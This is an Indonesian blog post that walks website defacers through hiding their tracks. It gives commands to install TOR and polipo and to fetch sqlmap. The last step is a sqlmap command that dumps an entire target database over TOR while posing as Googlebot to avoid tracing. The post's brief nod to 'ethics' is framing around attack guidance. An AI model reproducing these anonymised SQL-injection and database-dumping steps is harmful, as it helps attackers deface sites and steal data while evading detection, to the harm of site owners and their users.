[PERINGATAN] tindakan dalam melakukan injection web (dalam hal ini
tertuju ke deface) mungkin sangat2 sering kita dengar dna banyak juga
penyerangan nya, namun sadarkah Anda bahwa tindakan itu sebenarnya masih
bisa dilacak dan dibayang2i dengan google anlystic dan juga trace/jejak
yang tertinggal seperti IP kita, sangat lah penting bagi penyerang
untuk melakukan penyerangan nya secara invisible, oleh karena itu saya
menyarankan untuk lebih memproteksi diri untuk menyerang, dan di mohon
untuk tetap menjalankan etika-etika yang sudah ada, bagaimana caranya
menjadi invisible? gunakan TOR, program ini sangat lah baik untuk
membuat anda invisible, dan bagaimana pengaturan nya supaya bisa di
konfigurasikan dengan SQLMAP? asusmsi saya disini adalah bahwa Anda
semua sudah menggunakan linux, dalam hal ini saya lebih cenderung kae
distribusi debian/ubuntu yang memang banyak di pakai, kenapa tidak
windows, heheh silahkan dicari di google kenapa, heheheh.
1. Anda bisa mendapatkan atau melihat dokumentasi TOR itu ada disini https://www.torproject.org/docs/debian.html.en#ubuntu ,
2. add repo ini kedalam list repository /etc/apt/sources.list file:
CODE >> deb http://deb.torproject.org/torproject.org main
3. masukan gpg key nya di terminal Anda;
CODE >> gpg --keyserver keys.gnupg.net --recv 886DDD89
CODE >> gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
4. lalu refresh source Anda dan lakukan instalasi tor dengan menggunakan perintah:
CODE >> apt-get update
CODE >> apt-get install tor tor-geoipdb
5. start TOR dengan perintah
CODE >> /etc/init.d/tor start
lalu grab dan copy polito config file dari https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
lalu pindahkan atau rename file yang lama di /etc/polipo/config, gunakan configurasi dari URL.
restart polipo >> /etc/init.d/polipo restart
6. dapatkan SQLMAP svn trunk versi terakhir dengan cara
CODE >> svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap
7. dan sekarang gunakan TOR dan SQLMAP dengan perintah:
CODE >> ~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Semoga Bermanfaat
ICC
0 komentar:
Post a Comment